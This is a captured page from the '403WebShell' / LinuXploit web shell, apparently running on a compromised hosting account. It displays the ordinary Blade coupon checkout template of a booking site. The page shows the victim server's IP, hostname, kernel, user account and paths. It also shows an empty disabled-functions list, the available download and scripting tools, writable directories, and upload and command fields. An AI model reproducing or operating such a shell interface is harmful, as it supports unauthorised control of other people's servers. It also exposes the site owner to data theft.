Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.152.146
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Coupon/Views/frontend/booking/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Coupon/Views/frontend/booking/checkout-coupon.blade.php
<li class="d-flex flex-column border-0 mb-0">
    <div class="section-coupon-form">
        @if(in_array($booking->status , ['draft']))
            <div class="input-group group-form mb-3">
                <input type="text" class="form-control" name="coupon_code" placeholder="{{ __("Coupon code") }}">
                <div class="input-group-append">
                    <button class="btn btn-primary bravo_apply_coupon" type="button">
                        {{__("Apply")}}
                        <i class="fa fa-spin fa-spinner d-none"></i>
                    </button>
                </div>
            </div>
        @endif
        @if(!empty($booking->coupons))
            <ul class="p-0 mb-3 list-coupons">
                @foreach($booking->coupons as $item)
                    <li class="item">
                        <div class="label">
                            {{ $item->coupon_data['code'] }}
                            <i data-toggle="tooltip" data-placement="top" class="icofont-info-circle" data-original-title="{{ $item->coupon_data['name'] }}"></i>
                        </div>
                        <div class="val">
                            -{{ format_money( $item->coupon_amount ) }}
                            @if(in_array($booking->status , ['draft']))
                                <a href="#" data-code="{{ $item->coupon_code }}" class="text-danger text-decoration-none bravo_remove_coupon">
                                {{ __("[Remove]") }}
                                <i class="fa fa-spin fa-spinner d-none"></i>
                            </a>
                            @endif
                        </div>
                    </li>
                @endforeach
            </ul>
        @endif
        <div class="message alert-text mt-2"></div>
    </div>
</li>

Youez - 2016 - github.com/yon3zu
LinuXploit